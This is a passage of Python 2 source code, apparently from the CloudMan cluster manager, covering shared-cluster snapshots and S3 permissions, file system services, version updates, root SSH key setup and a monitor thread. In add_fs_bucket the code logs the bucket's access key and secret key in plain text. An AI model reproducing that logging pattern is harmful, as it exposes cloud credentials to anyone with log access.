share_string, e))
return False
# Check that the shared cluster's bucket exists
if not misc.bucket_exists(s3_conn, bucket_name, validate=False):
log.error(
"Shared cluster's bucket '%s' does not exist or is not accessible!" % bucket_name)
return False
# Create the new cluster's bucket
if not misc.bucket_exists(s3_conn, self.app.ud['bucket_cluster']):
misc.create_bucket(s3_conn, self.app.ud['bucket_cluster'])
# Copy contents of the shared cluster's bucket to the current cluster's
# bucket
fl = "shared_instance_file_list.txt"
if misc.get_file_from_bucket(s3_conn, bucket_name,
os.path.join(cluster_config_prefix, fl), fl, validate=False):
key_list = misc.load_yaml_file(fl)
for key in key_list:
misc.copy_file_in_bucket(
s3_conn, bucket_name, self.app.ud['bucket_cluster'],
key, key.split('/')[-1], preserve_acl=False, validate=False)
else:
log.error("Problem copying shared cluster configuration files. Cannot continue with "
"the shared cluster initialization.")
return False
# Create a volume from shared cluster's data snap and set current
# cluster's data volume
shared_cluster_pd_file = 'shared_p_d.yaml'
if misc.get_file_from_bucket(
s3_conn, self.app.ud['bucket_cluster'], 'persistent_data.yaml',
shared_cluster_pd_file):
scpd = misc.load_yaml_file(shared_cluster_pd_file)
self.initial_cluster_type = scpd.get('cluster_type', None)
log.debug("Initializing %s cluster type from shared cluster" % self.initial_cluster_type)
if 'shared_data_snaps' in scpd:
shared_data_vol_snaps = scpd['shared_data_snaps']
try:
# TODO: If support for multiple volumes comprising a file system becomes available,
# this code will need to adjusted to accommodate that. Currently, the assumption is
# that only 1 snap ID will be provided as the data file
# system.
snap = ec2_conn.get_all_snapshots(shared_data_vol_snaps)[0]
# Create a volume here because we'll be dealing with a volume-based file system
# and for that we need a volume ID
data_vol = ec2_conn.create_volume(
snap.volume_size, self.app.cloud_interface.get_zone(),
snapshot=snap)
# Old style for persistent data - delete if the other method works as expected
# scpd['data_filesystems'] = {'galaxyData': [{'vol_id': data_vol.id, 'size': data_vol.size}]}
# Compose a persistent_data compatible entry for the shared data volume so that
# the appropriate file system can be created as part of ``add_preconfigured_services``
# TODO: make it more general vs. galaxy specific
data_fs_yaml = {'ids': [data_vol.id],
'kind': 'volume',
'mount_point': '/mnt/galaxy',
'name': 'galaxy',
'roles': ['galaxyTools', 'galaxyData']}
scpd['filesystems'].append(data_fs_yaml)
log.info("Created a data volume '%s' of size %sGB from shared cluster's snapshot '%s'"
% (data_vol.id, data_vol.size, snap.id))
# Don't make the new cluster shared by default
del scpd['shared_data_snaps']
# Update new cluster's persistent_data.yaml
cc_file_name = 'cm_cluster_config.yaml'
log.debug("Dumping scpd to file {0} (which will become persistent_data.yaml): {1}"
.format(cc_file_name, scpd))
misc.dump_yaml_to_file(scpd, cc_file_name)
misc.save_file_to_bucket(
s3_conn, self.app.ud[
'bucket_cluster'], 'persistent_data.yaml',
cc_file_name)
except EC2ResponseError, e:
log.error("EC2 error creating volume from shared cluster's snapshot '%s': %s"
% (shared_data_vol_snaps, e))
return False
except Exception, e:
log.error("Error creating volume from shared cluster's snapshot '%s': %s"
% (shared_data_vol_snaps, e))
return False
else:
log.error("Loaded configuration from the shared cluster does not have a reference "
"to a shared data snapshot. Cannot continue.")
return False
# TODO: Reboot the instance so CloudMan source downloaded from the shared
# instance is used
# log.info("Rebooting the cluster so shared instance source can be reloaded.")
# self.reboot(soft=True)
# Reload user data and start the cluster as normally would
self.app.ud = self.app.cloud_interface.get_user_data(force=True)
if misc.get_file_from_bucket(s3_conn, self.app.ud['bucket_cluster'], 'persistent_data.yaml', 'pd.yaml'):
pd = misc.load_yaml_file('pd.yaml')
self.app.ud = misc.merge_yaml_objects(self.app.ud, pd)
reload(paths) # Must reload because paths.py might have changes in it
self.add_preconfigured_services()
return True
@TestFlag({})
@synchronized(s3_rlock)
def share_a_cluster(self, user_ids=None, canonical_ids=None):
"""
Setup the environment to make the current cluster shared (via a shared
volume snapshot).
This entails stopping all services to enable creation of a snapshot of
the data volume, allowing others to create a volume from the created
snapshot as well giving read permissions to cluster's bucket. If user_ids
are not provided, the bucket and the snapshot are made public.
:type user_ids: list
:param user_ids: The numeric Amazon IDs of users (with no dashes) to
give read permissions to the bucket and snapshot
:type canonical_ids: list
:param canonical_ids: A list of Amazon Canonical IDs (in the same linear
order as the ``user_ids``) that will be used to
enable sharing of individual objects in the
cluster's bucket.
"""
# TODO: rewrite this to use > 3 character variable names.
# TODO: recover services if the process fails midway
log.info("Setting up the cluster for sharing")
self.cluster_manipulation_in_progress = True
self._stop_app_level_services()
# Initiate snapshot of the galaxyData file system
snap_ids = []
svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for svc in svcs:
if ServiceRole.GALAXY_DATA in svc.svc_roles:
snap_ids = svc.create_snapshot(snap_description="CloudMan share-a-cluster %s; %s"
% (self.app.ud['cluster_name'], self.app.ud['bucket_cluster']))
# Create a new folder-like structure inside cluster's bucket and copy
# the cluster configuration files
s3_conn = self.app.cloud_interface.get_s3_connection()
# All of the shared cluster's config files will be stored with the
# specified prefix
shared_names_root = "shared/%s" % Time.now().strftime("%Y-%m-%d--%H-%M")
# Create current cluster config and save it to cluster's shared location,
# including the freshly generated snap IDs
conf_file_name = 'cm_shared_cluster_conf.yaml'
addl_data = {'shared_data_snaps': snap_ids}
self.console_monitor.create_cluster_config_file(
conf_file_name, addl_data=addl_data)
# Remove references to cluster's own data; this is shared via the snapshots above
# TODO: Add an option for a user to include any self-added file systems
# as well
sud = misc.load_yaml_file(conf_file_name)
fsl = sud.get('filesystems', [])
sfsl = [] # Shared file systems list
for fs in fsl:
roles = ServiceRole.from_string_array(fs['roles'])
# Including GALAXY_TOOLS role here breaks w/ new combined galaxyData/galaxyTools volume. We should
# probably change this to actually inspect and share base snapshots if applicable (like galaxyIndices) but
# never volumes.
# if ServiceRole.GALAXY_TOOLS in roles or ServiceRole.GALAXY_INDICES in roles:
if ServiceRole.GALAXY_INDICES in roles:
sfsl.append(fs)
sud['filesystems'] = sfsl
misc.dump_yaml_to_file(sud, conf_file_name)
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'],
os.path.join(shared_names_root, 'persistent_data.yaml'), conf_file_name)
# Keep track of which keys were copied into the shared folder
copied_key_names = [os.path.join(shared_names_root,
'persistent_data.yaml')]
# Save the remaining cluster configuration files
try:
# Get a list of all files stored in cluster's bucket excluding
# any keys that include '/' (i.e., are folders) or the previously
# copied 'persistent_data.yaml'. This way, if the number of config
# files changes in the future, this will still work
b = s3_conn.lookup(self.app.ud['bucket_cluster'])
keys = b.list(delimiter='/')
conf_files = []
for key in keys:
if '/' not in key.name and 'persistent_data.yaml' not in key.name:
conf_files.append(key.name)
except S3ResponseError, e:
log.error("Error collecting cluster configuration files form bucket '%s': %s"
% (self.app.ud['bucket_cluster'], e))
return False
# Copy current cluster's configuration files into the shared folder
for conf_file in conf_files:
if 'clusterName' not in conf_file: # Skip original cluster name file
misc.copy_file_in_bucket(s3_conn,
self.app.ud['bucket_cluster'],
self.app.ud['bucket_cluster'],
conf_file, os.path.join(
shared_names_root, conf_file),
preserve_acl=False)
copied_key_names.append(
os.path.join(shared_names_root, conf_file))
# Save the list of files contained in the shared bucket so derivative
# instances can know what to get with minimim permissions
fl = "shared_instance_file_list.txt"
misc.dump_yaml_to_file(copied_key_names, fl)
misc.save_file_to_bucket(s3_conn, self.app.ud['bucket_cluster'], os.path.join(shared_names_root, fl), fl)
copied_key_names.append(os.path.join(shared_names_root, fl)) # Add it to the list so it's permissions get set
# Adjust permissions on the new keys and the created snapshots
ec2_conn = self.app.cloud_interface.get_ec2_connection()
for snap_id in snap_ids:
try:
if user_ids:
log.debug(
"Adding createVolumePermission for snap '%s' for users '%s'" % (snap_id, user_ids))
ec2_conn.modify_snapshot_attribute(
snap_id, attribute='createVolumePermission',
operation='add', user_ids=user_ids)
else:
ec2_conn.modify_snapshot_attribute(
snap_id, attribute='createVolumePermission',
operation='add', groups=['all'])
except EC2ResponseError, e:
log.error(
"Error modifying snapshot '%s' attribute: %s" % (snap_id, e))
err = False
if canonical_ids:
# In order to list the keys associated with a shared instance, a user
# must be given READ permissions on the cluster's bucket as a whole.
# This allows a given user to list the contents of a bucket but not
# access any of the keys other than the ones granted the permission
# next (i.e., keys required to bootstrap the shared instance)
# misc.add_bucket_user_grant(s3_conn, self.app.ud['bucket_cluster'], 'READ', canonical_ids, recursive=False)
# Grant READ permissions for the keys required to bootstrap the
# shared instance
for k_name in copied_key_names:
if not misc.add_key_user_grant(s3_conn, self.app.ud['bucket_cluster'], k_name, 'READ', canonical_ids):
log.error(
"Error adding READ permission for key '%s'" % k_name)
err = True
else: # If no canonical_ids are provided, means to set the permissions to public-read
# See above, but in order to access keys, the bucket root must be given read permissions
# FIXME: this method sets the bucket's grant to public-read and
# removes any individual user's grants - something share-a-cluster
# depends on down the line if the publicly shared instance is deleted
# misc.make_bucket_public(s3_conn, self.app.ud['bucket_cluster'])
for k_name in copied_key_names:
if not misc.make_key_public(s3_conn, self.app.ud['bucket_cluster'], k_name):
log.error("Error making key '%s' public" % k_name)
err = True
if err:
# TODO: Handle this with more user input?
log.error("Error modifying permissions for keys in bucket '%s'" %
self.app.ud['bucket_cluster'])
self._start_app_level_services()
self.cluster_manipulation_in_progress = False
return True
@synchronized(s3_rlock)
def get_shared_instances(self):
"""
Get a list of point-in-time shared instances of this cluster.
Returns a list such instances. Each element of the returned list is a
dictionary with ``bucket``, ``snap``, and ``visibility`` keys.
"""
lst = []
if self.app.TESTFLAG is True:
lst.append({"bucket": "cm-7834hdoeiuwha/TESTshare/2011-08-14--03-02/", "snap":
'snap-743ddw12', "visibility": 'Shared'})
lst.append({"bucket": "cm-7834hdoeiuwha/TESTshare/2011-08-19--10-49/", "snap":
'snap-gf69348h', "visibility": 'Public'})
return lst
try:
s3_conn = self.app.cloud_interface.get_s3_connection()
b = misc.get_bucket(s3_conn, self.app.ud['bucket_cluster'])
if b:
# Get a list of shared 'folders' containing clusters'
# configuration
folder_list = b.list(prefix='shared/', delimiter='/')
for folder in folder_list:
# Get snapshot assoc. with the current shared cluster
tmp_pd = 'tmp_pd.yaml'
if misc.get_file_from_bucket(
s3_conn, self.app.ud['bucket_cluster'],
os.path.join(folder.name, 'persistent_data.yaml'), tmp_pd):
tmp_ud = misc.load_yaml_file(tmp_pd)
# Currently, only a single volume snapshot can be associated
# a shared instance so pull it out of the list
if 'shared_data_snaps' in tmp_ud and len(tmp_ud['shared_data_snaps']) == 1:
snap_id = tmp_ud['shared_data_snaps'][0]
else:
snap_id = "Missing-ERROR"
try:
os.remove(tmp_pd)
except OSError:
pass # Best effort temp file cleanup
else:
snap_id = "Missing-ERROR"
# Get permission on the persistent_data file and assume
# the entire cluster shares those permissions
k = b.get_key(
os.path.join(folder.name, 'persistent_data.yaml'))
if k is not None:
acl = k.get_acl()
if 'AllUsers' in str(acl):
visibility = 'Public'
else:
visibility = 'Shared'
lst.append(
{"bucket": os.path.join(self.app.ud['bucket_cluster'],
folder.name), "snap": snap_id, "visibility": visibility})
except S3ResponseError, e:
log.error(
"Problem retrieving references to shared instances: %s" % e)
return lst
@synchronized(s3_rlock)
def delete_shared_instance(self, shared_instance_folder, snap_id):
"""
Deletes all files under shared_instance_folder (i.e., all keys with
``shared_instance_folder`` prefix) and ``snap_id``, thus deleting the
shared instance of the given cluster.
:type shared_instance_folder: str
:param shared_instance_folder: Prefix for the shared cluster instance
configuration (e.g., ``shared/2011-02-24--20-52/``)
:type snap_id: str
:param snap_id: Snapshot ID to be deleted (e.g., ``snap-04c01768``)
"""
if self.app.TESTFLAG is True:
log.debug("Tried deleting shared instance for folder '%s' and snap '%s' but TESTFLAG is set." % (
shared_instance_folder, snap_id))
return True
log.debug("Calling delete shared instance for folder '%s' and snap '%s'" % (shared_instance_folder, snap_id))
ok = True # Mark if encountered error but try to delete as much as possible
try:
s3_conn = self.app.cloud_interface.get_s3_connection()
# Revoke READ grant for users associated with the instance
# being deleted but do so only if the given users do not have
# access to any other shared instances.
# users_whose_grant_to_remove = misc.get_users_with_grant_on_only_this_folder(s3_conn, self.app.ud['bucket_cluster'], shared_instance_folder)
# if len(users_whose_grant_to_remove) > 0:
# misc.adjust_bucket_ACL(s3_conn, self.app.ud['bucket_cluster'], users_whose_grant_to_remove)
# Remove keys and folder associated with the given shared instance
b = misc.get_bucket(s3_conn, self.app.ud['bucket_cluster'])
key_list = b.list(prefix=shared_instance_folder)
for key in key_list:
log.debug(
"As part of shared cluster instance deletion, deleting key '%s' from bucket '%s'" % (key.name,
self.app.ud['bucket_cluster']))
key.delete()
except S3ResponseError, e:
log.error("Problem deleting keys in '%s': %s" % (
shared_instance_folder, e))
ok = False
# Delete the data snapshot associated with the shared instance being
# deleted
try:
ec2_conn = self.app.cloud_interface.get_ec2_connection()
ec2_conn.delete_snapshot(snap_id)
log.debug(
"As part of shared cluster instance deletion, deleted snapshot '%s'" % snap_id)
except EC2ResponseError, e:
log.error(
"As part of shared cluster instance deletion, problem deleting snapshot '%s': %s" % (snap_id, e))
ok = False
return ok
def update_file_system(self, file_system_name):
""" This method is used to update the underlying EBS volume/snapshot
that is used to hold the provided file system. This is useful when
changes have been made to the underlying file system and those changes
wish to be preserved beyond the runtime of the current instance. After
calling this method, terminating and starting the cluster instance over
will preserve any changes made to the file system (provided the snapshot
created via this method has not been deleted).
The method performs the following steps:
1. Suspend all application-level services
2. Unmount and detach the volume associated with the file system
3. Create a snapshot of the volume
4. Delete references to the original file system's EBS volume
5. Add a new reference to the created snapshot, which gets picked up
by the monitor and a new volume is created and file system mounted
6. Unsuspend services
"""
if self.app.TESTFLAG is True:
log.debug("Attempted to update file system '%s', but TESTFLAG is set." % file_system_name)
return None
log.info("Initiating file system '%s' update." % file_system_name)
self.cluster_manipulation_in_progress = True
self._stop_app_level_services()
# Initiate snapshot of the specified file system
snap_ids = []
svcs = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
found_fs_name = False # Flag to ensure provided fs name was actually found
for svc in svcs:
if svc.name == file_system_name:
found_fs_name = True
# Create a snapshot of the given volume/file system
snap_ids = svc.create_snapshot(snap_description="File system '%s' from CloudMan instance '%s'; bucket: %s"
% (file_system_name, self.app.ud['cluster_name'], self.app.ud['bucket_cluster']))
# Remove the old volume by removing the entire service
if len(snap_ids) > 0:
log.debug("Removing file system '%s' service as part of the file system update"
% file_system_name)
svc.remove()
log.debug("Creating file system '%s' from snaps '%s'" % (file_system_name, snap_ids))
fs = Filesystem(self.app, file_system_name, svc.svc_roles)
for snap_id in snap_ids:
fs.add_volume(from_snapshot_id=snap_id)
self.add_master_service(fs)
# Monitor will pick up the new service and start it up but
# need to wait until that happens before can add rest of
# the services
while fs.state != service_states.RUNNING:
log.debug("Service '%s' not quite ready: '%s'" % (
fs.get_full_name(), fs.state))
time.sleep(6)
if found_fs_name:
self._start_app_level_services()
self.cluster_manipulation_in_progress = False
log.info("File system '%s' update complete" % file_system_name)
return True
else:
log.error("Did not find file system with name '%s'; update not performed." %
file_system_name)
return False
def add_fs_bucket(self, bucket_name, fs_name=None, fs_roles=[ServiceRole.GENERIC_FS],
bucket_a_key=None, bucket_s_key=None, persistent=False):
"""
Add a new file system service for a bucket-based file system.
"""
log.info("Adding a {4} file system {3} from bucket {0} (w/ creds {1}:{2})"
.format(bucket_name, bucket_a_key, bucket_s_key, fs_name, persistent))
fs = Filesystem(self.app, fs_name or bucket_name,
persistent=persistent, svc_roles=fs_roles)
fs.add_bucket(bucket_name, bucket_a_key, bucket_s_key)
self.add_master_service(fs)
# Inform all workers to add the same FS (the file system will be the same
# and sharing it over NFS does not seems to work)
for w_inst in self.worker_instances:
w_inst.send_add_s3fs(bucket_name, fs_roles)
log.debug("Master done adding FS from bucket {0}".format(bucket_name))
@TestFlag(None)
def add_fs_volume(self, fs_name, fs_kind, vol_id=None, snap_id=None, vol_size=0,
fs_roles=[ServiceRole.GENERIC_FS], persistent=False, dot=False):
"""
Add a new file system based on an existing volume, a snapshot, or a new
volume. Provide ``fs_kind`` to distinguish between these (accepted values
are: ``volume``, ``snapshot``, or ``new_volume``). Depending on which
kind is provided, must provide ``vol_id``, ``snap_id``, or ``vol_size``,
respectively - but not all!
"""
log.info("Adding a {0}-based file system '{1}'".format(fs_kind, fs_name))
fs = Filesystem(self.app, fs_name, persistent=persistent, svc_roles=fs_roles)
fs.add_volume(vol_id=vol_id, size=vol_size, from_snapshot_id=snap_id, dot=dot)
self.add_master_service(fs)
log.debug("Master done adding {0}-based FS {1}".format(fs_kind, fs_name))
@TestFlag(None)
def add_fs_gluster(self, gluster_server, fs_name,
fs_roles=[ServiceRole.GENERIC_FS], persistent=False):
"""
Add a new file system service for a Gluster-based file system.
"""
log.info("Adding a Gluster-based file system {0} from Gluster server {1}".format(fs_name, gluster_server))
fs = Filesystem(self.app, fs_name, persistent=persistent, svc_roles=fs_roles)
fs.add_glusterfs(gluster_server)
self.add_master_service(fs)
# Inform all workers to add the same FS (the file system will be the same
# and sharing it over NFS does not seems to work)
for w_inst in self.worker_instances:
# w_inst.send_add_nfs_fs(nfs_server, fs_name, fs_roles, username, pwd)
w_inst.send_mount_points()
log.debug("Master done adding FS from Gluster server {0}".format(gluster_server))
@TestFlag(None)
def add_fs_nfs(self, nfs_server, fs_name, username=None, pwd=None,
fs_roles=[ServiceRole.GENERIC_FS], persistent=False):
"""
Add a new file system service for a NFS-based file system. Optionally,
provide password-based credentials (``username`` and ``pwd``) for
accessing the NFS server.
"""
log.info("Adding a NFS-based file system {0} from NFS server {1}".format(fs_name, nfs_server))
fs = Filesystem(self.app, fs_name, persistent=persistent, svc_roles=fs_roles)
fs.add_nfs(nfs_server, username, pwd)
self.add_master_service(fs)
# Inform all workers to add the same FS (the file system will be the same
# and sharing it over NFS does not seems to work)
for w_inst in self.worker_instances:
# w_inst.send_add_nfs_fs(nfs_server, fs_name, fs_roles, username, pwd)
w_inst.send_mount_points()
log.debug("Master done adding FS from NFS server {0}".format(nfs_server))
def stop_worker_instances(self):
"""
Initiate termination of all worker instances.
"""
log.info("Stopping all '%s' worker instance(s)" % len(
self.worker_instances))
to_terminate = []
for i in self.worker_instances:
to_terminate.append(i)
for inst in to_terminate:
log.debug(
"Initiating termination of instance %s" % inst.get_desc())
inst.terminate()
# log.debug("Initiated termination of instance '%s'" % inst.id )
@TestFlag({}) # {'default_CM_rev': '64', 'user_CM_rev':'60'} # For testing
@synchronized(s3_rlock)
def check_for_new_version_of_CM(self):
"""
Check revision metadata for CloudMan (CM) in user's bucket and the default CM bucket.
:rtype: dict
:return: A dictionary with 'default_CM_rev' and 'user_CM_rev' keys where each key
maps to an string representation of an int that corresponds to the version of
CloudMan in the default repository vs. the currently running user's version.
If CloudMan is unable to determine the versions, an empty dict is returned.
"""
log.debug("Checking for new version of CloudMan")
s3_conn = self.app.cloud_interface.get_s3_connection()
user_CM_rev = misc.get_file_metadata(
s3_conn, self.app.ud['bucket_cluster'], self.app.config.cloudman_source_file_name, 'revision')
default_CM_rev = misc.get_file_metadata(
s3_conn, self.app.ud['bucket_default'], self.app.config.cloudman_source_file_name, 'revision')
log.debug("Revision number for user's CloudMan: '%s'; revision number for default CloudMan: '%s'" %
(user_CM_rev, default_CM_rev))
if user_CM_rev and default_CM_rev:
try:
if int(default_CM_rev) > int(user_CM_rev):
return {'default_CM_rev': default_CM_rev, 'user_CM_rev': user_CM_rev}
except Exception:
pass
return {}
@synchronized(s3_rlock)
def update_users_CM(self):
"""
If the revision number of CloudMan (CM) source file (as stored in file's metadata)
in user's bucket is less than that of default CM, upload the new version of CM to
user's bucket. Note that the update will take effect only after the next cluster reboot.
:rtype: bool
:return: If update was successful, return True.
Else, return False
"""
if self.app.TESTFLAG is True:
log.debug("Attempted to update CM, but TESTFLAG is set.")
return None
if self.check_for_new_version_of_CM():
log.info("Updating CloudMan application source file in the cluster's bucket '%s'. "
"It will be automatically available the next time this cluster is instantiated."
% self.app.ud['bucket_cluster'])
s3_conn = self.app.cloud_interface.get_s3_connection()
# Make a copy of the old/original CM source and boot script in the cluster's bucket
# called 'copy_name' and 'copy_boot_name', respectively
copy_name = "%s_%s" % (
self.app.config.cloudman_source_file_name, dt.date.today())
copy_boot_name = "%s_%s" % (
self.app.ud['boot_script_name'], dt.date.today())
if misc.copy_file_in_bucket(s3_conn, self.app.ud['bucket_cluster'],
self.app.ud['bucket_cluster'], self.app.config.cloudman_source_file_name, copy_name) and \
misc.copy_file_in_bucket(
s3_conn, self.app.ud['bucket_cluster'],
self.app.ud['bucket_cluster'], self.app.ud['boot_script_name'], copy_boot_name):
# Now copy CloudMan source from the default bucket to cluster's bucket as
# self.app.config.cloudman_source_file_name and cm_boot.py as
# 'boot_script_name'
if misc.copy_file_in_bucket(
s3_conn, self.app.ud['bucket_default'],
self.app.ud[
'bucket_cluster'], self.app.config.cloudman_source_file_name,
self.app.config.cloudman_source_file_name) and misc.copy_file_in_bucket(s3_conn,
self.app.ud[
'bucket_default'], self.app.ud['bucket_cluster'],
'cm_boot.py', self.app.ud['boot_script_name']):
return True
return False
def expand_user_data_volume(self, new_vol_size, fs_name, snap_description=None,
delete_snap=False):
"""
Mark the file system ``fs_name`` for size expansion. For full details on how
this works, take a look at the file system expansion method for the
respective file system type.
If the underlying file system supports/requires creation of a point-in-time
snapshot, setting ``delete_snap`` to ``False`` will retain the snapshot
that will be creted during the expansion process under the given cloud account.
If the snapshot is to be kept, a brief ``snap_description`` can be provided.
"""
# Match fs_name with a service or if it's null or empty, default to
# GALAXY_DATA role
if fs_name:
svcs = self.app.manager.get_services(svc_name=fs_name)
if svcs:
svc = svcs[0]
else:
log.error("Could not initiate expansion of {0} file system because "
"the file system was not found?".format(fs_name))
return
else:
svc = self.app.manager.get_services(
svc_role=ServiceRole.GALAXY_DATA)[0]
log.debug("Marking '%s' for expansion to %sGB with snap description '%s'"
% (svc.get_full_name(), new_vol_size, snap_description))
svc.state = service_states.CONFIGURING
svc.grow = {
'new_size': new_vol_size, 'snap_description': snap_description,
'delete_snap': delete_snap}
@TestFlag('TESTFLAG_ROOTPUBLICKEY')
def get_root_public_key(self):
"""
Generate or retrieve a public ssh key for the user running CloudMan and
return it as a string. The key file is stored in ``id_rsa.pub``.
Also, the private portion of the key is copied to ``/root/.ssh/id_rsa``
to enable passwordless login by job manager jobs.
"""
if self.root_pub_key is None:
if not os.path.exists('id_rsa'):
log.debug("Generating root user's public key...")
ret_code = subprocess.call('ssh-keygen -t rsa -N "" -f id_rsa', shell=True)
if ret_code == 0:
log.debug("Successfully generated root user's public key.")
f = open('id_rsa.pub')
self.root_pub_key = f.readline()
f.close()
# Must copy private key at least to /root/.ssh for
# passwordless login to work
shutil.copy2('id_rsa', '/root/.ssh/id_rsa')
log.debug(
"Successfully retrieved root user's public key from file.")
else:
log.error("Encountered a problem while creating root user's public key, process returned error code '%s'." % ret_code)
else: # This is master restart, so
f = open('id_rsa.pub')
self.root_pub_key = f.readline()
f.close()
if not os.path.exists('/root/.ssh/id_rsa'):
# Must copy private key at least to /root/.ssh for passwordless login to work
shutil.copy2('id_rsa', '/root/.ssh/id_rsa')
log.info("Successfully retrieved root user's public key from file.")
return self.root_pub_key
@TestFlag(None)
def save_host_cert(self, host_cert):
"""
Save host certificate ``host_cert`` to ``/root/.ssh/knowns_hosts``
"""
log.debug("Saving host certificate '%s'" % host_cert)
log.debug("Saving worker host certificate.")
f = open("/root/.ssh/known_hosts", 'a')
f.write(host_cert)
f.close()
return True
def get_workers_status(self, worker_id=None):
"""
Retrieves current status of all worker instances or of only worker
instance whose ID was passed as the parameter. Returns a dict
where instance ID's are the keys.
"""
if self.app.TESTFLAG is True:
log.debug("Attempted to get worker status, but TESTFLAG is set.")
return {}
workers_status = {}
if worker_id:
log.info("Checking status of instance '%s'" % worker_id)
try:
reservation = self.app.cloud_interface.get_all_instances(worker_id.strip())
if reservation:
workers_status[reservation[0]
.instances[0].id] = reservation[0].instances[0].state
except Exception, e:
log.error("Error while updating instance '%s' status: %s" % (worker_id, e))
else:
logging.info("Checking status of all worker nodes... ")
for w_instance in self.worker_instances:
workers_status[w_instance.id] = w_instance.get_m_state()
return workers_status
def get_num_available_workers(self):
"""
Return the number of available worker nodes. A worker node is assumed
available if it is in state ``READY``.
"""
# log.debug("Gathering number of available workers" )
num_available_nodes = 0
for inst in self.worker_instances:
if inst.node_ready is True:
num_available_nodes += 1
return num_available_nodes
# ==========================================================================
# ============================ UTILITY METHODS =============================
# ========================================================================
@synchronized(s3_rlock)
def _make_file_from_list(self, input_list, file_name, bucket_name=None):
"""
Create a file from provided list so that each list element is
printed on a separate line. If bucket_name parameter is provided,
save created file to the bucket.
:rtype: bool
:return: True if a file was created and, if requested by provding
bucket name, successfully saved to the bucket. False if length of
provided list is 0 or bucket save fails.
"""
if len(input_list) > 0:
with open(file_name, 'w') as f:
for el in input_list:
f.write("%s\n" % el)
if bucket_name is not None:
log.debug("Saving file '%s' created from list '%s' to user's bucket '%s'." %
(file_name, input_list, bucket_name))
s3_conn = self.app.cloud_interface.get_s3_connection()
return misc.save_file_to_bucket(s3_conn, bucket_name, file_name, file_name)
else:
log.debug("Will not create file '%s' from provided list because the list is empty." %
file_name)
return False
return True
def _update_file(self, file_name, search_exp, replace_exp):
"""
Search file_name for a line containing search_exp and replace that
expression with replace_exp.
:type file_name: str
:param file_name: Name of the file to modify
:type search_exp: str
:param search_exp: String for which to search
:type replace_exp: str
:param replace_exp: String used to replace search string
"""
fin = open(file_name)
fout = open("%s-tmp" % file_name, "w")
for line in fin:
fout.write(line.replace(search_exp, replace_exp))
fin.close()
fout.close()
shutil.copy("%s-tmp" % file_name, file_name)
def update_etc_host(self):
"""
This method is for syncing hosts files in all workers with the master.
It will copy the master etc hosts into a shared folder and send a message
to the workers to inform them of the change.
"""
shutil.copy("/etc/hosts", paths.P_ETC_TRANSIENT_PATH)
for wrk in self.worker_instances:
wrk.send_sync_etc_host(paths.P_ETC_TRANSIENT_PATH)
def update_condor_host(self, new_worker_ip):
"""
Add the new pool to the condor big pool
"""
srvs = self.get_services(svc_role=ServiceRole.HTCONDOR)
if srvs:
srvs[0].modify_htcondor("ALLOW_WRITE", new_worker_ip)
def get_status_dict(self):
"""
Return a status dictionary for the current instance.
The dictionary includes the following keys: ``id`` of the instance;
``ld`` as a load of the instance over the past 1, 5, and 15 minutes
(e.g., ``0.00 0.02 0.39``); ``time_in_state`` as the length of time
since instance state was last changed; ``instance_type`` as the type
of the instance provisioned by the cloud; and ``public_ip`` with the
public IP address of the instance.
"""
public_ip = self.app.cloud_interface.get_public_ip()
if self.app.TESTFLAG:
num_cpus = 1
load = "0.00 0.02 0.39"
return {'id': 'localtest', 'ld': load,
'time_in_state': misc.formatSeconds(Time.now() - self.startup_time),
'instance_type': 'tester', 'public_ip': public_ip}
else:
num_cpus = int(commands.getoutput("cat /proc/cpuinfo | grep processor | wc -l"))
load = (commands.getoutput("cat /proc/loadavg | cut -d' ' -f1-3")).strip() # Returns system load in format "0.00 0.02 0.39" for the past 1, 5, and 15 minutes, respectively
if load != 0:
lds = load.split(' ')
if len(lds) == 3:
load = "%s %s %s" % (float(lds[0]) / int(num_cpus), float(
lds[1]) / int(num_cpus), float(lds[2]) / int(num_cpus))
else:
# Debug only, this should never happen. If the interface is
# able to display this, there is load.
load = "0 0 0"
return {'id': self.app.cloud_interface.get_instance_id(), 'ld': load, 'time_in_state': misc.formatSeconds(Time.now() - self.startup_time), 'instance_type': self.app.cloud_interface.get_type(), 'public_ip': public_ip}
class ConsoleMonitor(object):
def __init__(self, app):
self.app = app
self.num_workers_processed = 0
self.sge_was_setup = False
self.last_state_change_time = None
self.conn = comm.CMMasterComm()
if not self.app.TESTFLAG:
self.conn.setup()
self.sleeper = misc.Sleeper()
self.running = True
# Keep some local stats to be able to adjust system updates
self.last_update_time = Time.now()
self.last_system_change_time = Time.now()
self.update_frequency = 10 # Frequency (in seconds) between system updates
self.num_workers = -1
# Start the monitor thread
self.monitor_thread = threading.Thread(target=self.__monitor)
def start(self):
"""
Start the monitor thread, which monitors and manages all the services
visible to CloudMan.
"""
self.last_state_change_time = Time.now()
if not self.app.TESTFLAG:
# Set 'role' and 'clusterName' tags for the master instance
try:
i_id = self.app.cloud_interface.get_instance_id()
ir = self.app.cloud_interface.get_all_instances(i_id)
self.app.cloud_interface.add_tag(
ir[0].instances[0], 'clusterName', self.app.ud['cluster_name'])
self.app.cloud_interface.add_tag(
ir[0].instances[0], 'role', self.app.ud['role'])
self.app.cloud_interface.add_tag(ir[0].instances[0], 'Name',
"{0}: {1}".format(self.app.ud['role'], self.app.ud['cluster_name']))
except Exception, e:
log.debug("Error setting tags on the master instance: %s" % e)
self.monitor_thread.start()
def shutdown(self):
"""
Attempts to gracefully shut down the monitor thread, in turn stopping
system updates.
"""
log.info("Monitor received stop signal")
try:
log.info("Sending stop signal to the Monitor thread")
if self.conn:
self.conn.shutdown()
self.running = False
self.sleeper.wake()
log.info("ConsoleMonitor thread stopped")
except:
pass
def _update_frequency(self):
""" Update the frequency value at which system updates are performed by the monitor.
"""
# Check if a worker was added/removed since the last update
if self.num_workers != len(self.app.manager.worker_instances):
self.last_system_change_time = Time.now()
self.num_workers = len(self.app.manager.worker_instances)
# Update frequency: as more time passes since a change in the system,
# progressivley back off on frequency of system updates
if (Time.now() - self.last_system_change_time).seconds > 600:
self.update_frequency = 60 # If no system changes for 10 mins, run update every minute
elif (Time.now() - self.last_system_change_time).seconds > 300:
self.update_frequency = 30 # If no system changes for 5 mins, run update every 30 secs
else:
self.update_frequency = 10 # If last system change within past 5 mins, run update every 10 secs
def update_instance_sw_state(self, inst_id, state):
"""
:type inst_id: string
:type state: string
"""
log.debug("Updating local ref to instance '%s' state to '%s'" % (inst_id, state))
for inst in self.app.manager.worker_instances:
